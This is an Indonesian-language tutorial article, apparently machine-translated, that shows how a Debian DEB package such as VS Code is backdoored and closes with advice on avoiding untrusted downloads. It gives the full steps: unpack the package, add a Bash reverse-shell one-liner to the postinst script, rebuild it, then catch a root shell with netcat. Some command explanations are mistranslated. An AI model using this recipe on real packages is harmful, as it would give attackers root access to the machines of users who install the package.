Tahukah Anda bahwa penyerang dapat memodifikasi skrip yang dikemas dalam file DEB untuk mendapatkan akses tidak sah ke PC Anda? Beginilah cara paket DEB di-backdoor.

Poin Penting

  • Paket DEB dapat dengan mudah di-backdoor, memungkinkan penyerang memasukkan kode berbahaya ke dalam sistem Anda saat Anda menginstalnya dengan izin root.
  • Paket DEB yang terinfeksi sulit dideteksi karena mungkin tidak ditandai oleh perangkat lunak antivirus atau solusi cloud seperti VirusTotal.
  • Untuk melindungi diri Anda sendiri, hindari mengunduh paket DEB dari situs sembarangan, tetap berpegang pada situs unduhan resmi atau situs tepercaya komunitas, dan pertimbangkan untuk memasang alat keamanan untuk mengamankan sistem Linux Anda dari jaringan serangan.

File DEB adalah paket perangkat lunak yang merupakan format utama pengiriman perangkat lunak pada distribusi Linux berbasis Debian.

Untuk menginstal paket DEB, Anda harus menggunakan manajer paket seperti dpkg dengan izin root. Penyerang mengambil keuntungan dari ini dan memasukkan pintu belakang ke dalam paket-paket ini. Saat Anda menginstalnya dengan dpkg atau pengelola paket lainnya, kode berbahaya juga dijalankan bersamaan dan membahayakan sistem Anda.

instagram viewer

Mari kita telusuri bagaimana paket DEB di-backdoor dan apa yang dapat Anda lakukan untuk melindungi diri Anda sendiri.

Bagaimana Paket DEB Dilindungi?

Sebelum Anda memahami bagaimana paket DEB di-backdoor, mari kita jelajahi apa yang ada di dalam paket DEB. Untuk demonstrasi, saya akan mengunduh paket Microsoft Visual Studio Code DEB dari situs resmi Microsoft. Ini adalah paket yang sama yang Anda unduh jika Anda ingin menginstal VS Code di Linux.

Unduh:Kode Visual Studio

Sekarang setelah paket target Anda diunduh, sekarang saatnya untuk membongkarnya. Anda dapat membongkar paket DEB menggunakan dpkg-deb perintah dengan -R tandai diikuti dengan jalur untuk menyimpan konten:

dpkg-deb -R

Ini harus mengekstraksi isi paket VS Code.

Pindah ke dalam folder Anda akan menemukan banyak direktori, namun minat kami hanya terletak pada DEBIAN direktori. Direktori ini berisi skrip pengelola yang dijalankan selama instalasi dengan hak akses root. Seperti yang mungkin sudah Anda ketahui, penyerang mengubah skrip di direktori ini.

Untuk demonstrasi, saya akan memodifikasi postinst skrip dan tambahkan shell TCP terbalik Bash satu baris sederhana. Seperti namanya, ini adalah skrip yang dijalankan setelah paket diinstal pada sistem.

Ini berisi perintah yang menyelesaikan konfigurasi seperti menyiapkan tautan simbolik, penanganan ketergantungan, dan banyak lagi. Anda dapat menemukan banyak sekali shell terbalik yang berbeda di internet. Kebanyakan dari mereka akan bekerja dengan cara yang sama. Berikut contoh one-liner shell terbalik:

bash -i >& /dev/tcp/127.0.0.1/42069 0>&1

Penjelasan perintah:

  • pesta: Ini adalah perintah yang memanggil shell Bash.
  • -Saya: Bendera tersebut memberitahu Bash untuk berjalan dalam mode interaktif yang memungkinkan I/O perintah real-time.
  • >& /dev/tcp/ip/port: Ini mengalihkan keluaran standar dan kesalahan standar ke soket jaringan, pada dasarnya membuat koneksi TCP ke Dan .
  • 0>&1: Ini mengalihkan input dan output ke lokasi yang sama, yaitu ke soket jaringan.

Bagi mereka yang belum tahu, reverse shell adalah jenis kode yang, ketika dijalankan pada mesin target, memulai koneksi kembali ke mesin penyerang. Reverse shell adalah cara terbaik untuk melewati batasan firewall karena lalu lintas dihasilkan dari mesin di belakang firewall.

Berikut tampilan skrip yang dimodifikasi:

Seperti yang Anda lihat, semuanya sama tetapi hanya satu baris yang ditambahkan, yaitu shell terbalik Bash kami. Sekarang Anda perlu membuat file kembali ke ".deb" format. Cukup gunakan dpkg perintah dengan --membangun bendera atau gunakan dpkg-deb dengan -B tandai diikuti dengan jalur konten yang diekstraksi:

dpkg --build 
dpkg-deb -b

Sekarang paket DEB backdoor siap dikirimkan ke situs jahat. Mari kita simulasikan skenario dimana korban telah mengunduh paket DEB ke sistem mereka dan menginstalnya seperti paket reguler lainnya.

Panel terminal atas adalah untuk POV korban dan panel bawah adalah POV penyerang. Korban sedang menginstal paket dengan sudo dpkg -i dan penyerang dengan sabar mendengarkan koneksi masuk menggunakan netcat perintah di Linux.

Segera setelah instalasi selesai, perhatikan bahwa penyerang mendapatkan koneksi shell terbalik dan sekarang memiliki akses root ke sistem korban. Sekarang Anda tahu bagaimana paket DEB di-backdoor. Sekarang mari kita pelajari bagaimana Anda dapat melindungi diri sendiri.

Cara Mendeteksi Jika Paket DEB Berbahaya

Sekarang setelah Anda mengetahui bahwa paket DEB yang terinfeksi adalah suatu hal, Anda pasti bertanya-tanya bagaimana cara menemukan paket yang terinfeksi. Sebagai permulaan, Anda dapat mencoba menggunakan a Perangkat lunak antivirus Linux seperti ClamAV. Sayangnya, ketika pemindaian ClamAV dijalankan pada paket tersebut, paket tersebut tidak ditandai sebagai berbahaya. Berikut hasil scannya:

Jadi, kecuali Anda memiliki solusi antivirus premium (yang bukan merupakan jaminan bahwa Anda tidak akan diretas), cukup sulit untuk mendeteksi paket DEB yang berbahaya. Mari kita coba menggunakan solusi cloud seperti situs VirusTotal:

Seperti yang Anda lihat, VirusTotal tidak mendeteksi ada yang salah dengannya. Ya, satu-satunya cara untuk melindungi diri Anda dari ancaman semacam itu adalah dengan mengikuti kebersihan keamanan dasar seperti tidak selalu mengunduh file dari sumber yang tidak dikenal memeriksa hash suatu file, dan secara umum, hindari menginstal perangkat lunak yang mencurigakan.

Internet penuh dengan ancaman seperti itu. Satu-satunya cara untuk berselancar tanpa kehilangan data Anda adalah dengan mengetahui diri Anda sendiri dan menelusuri situs tepercaya. Selain itu, untuk Linux, Anda juga harus mencoba mencari apakah perangkat lunak yang Anda unduh memiliki Varian AppImage karena bersifat mandiri dan dapat dimasukkan ke dalam sandbox sehingga terhindar dari kontak dengan sistem Anda.

Jangan Mengunduh Paket DEB Dari Situs Acak!

Paket DEB pada dasarnya tidak buruk, namun penyerang dapat dengan mudah menggunakan senjata dan mengirimkannya ke pengguna yang tidak menaruh curiga. Seperti yang ditunjukkan, paket DEB dapat dengan mudah dibuka dan dimodifikasi untuk menambahkan kode khusus hanya dengan beberapa perintah, menjadikannya vektor umum untuk pengiriman malware.

Bahkan pintu belakang sederhana pada paket DEB tidak tertangkap oleh solusi antivirus terbaik. Jadi hal terbaik yang harus dilakukan adalah bermain aman, menggunakan akal sehat saat menjelajahi web, dan selalu mengunduh perangkat lunak hanya dari situs pengunduhan resmi atau situs komunitas yang tepercaya.

Sekarang setelah Anda menyadari risiko keamanan yang timbul saat menginstal paket DEB dari situs baru atau tidak dikenal, Anda harus berhati-hati saat menginstal perangkat lunak baru. Namun, berhati-hati terhadap apa yang Anda instal saja tidak cukup. Sistem Linux Anda juga dapat menjadi target serangan jaringan.

Untuk memastikan Anda aman jika terjadi serangan jaringan, Anda harus mempertimbangkan untuk memasang alat keamanan jaringan.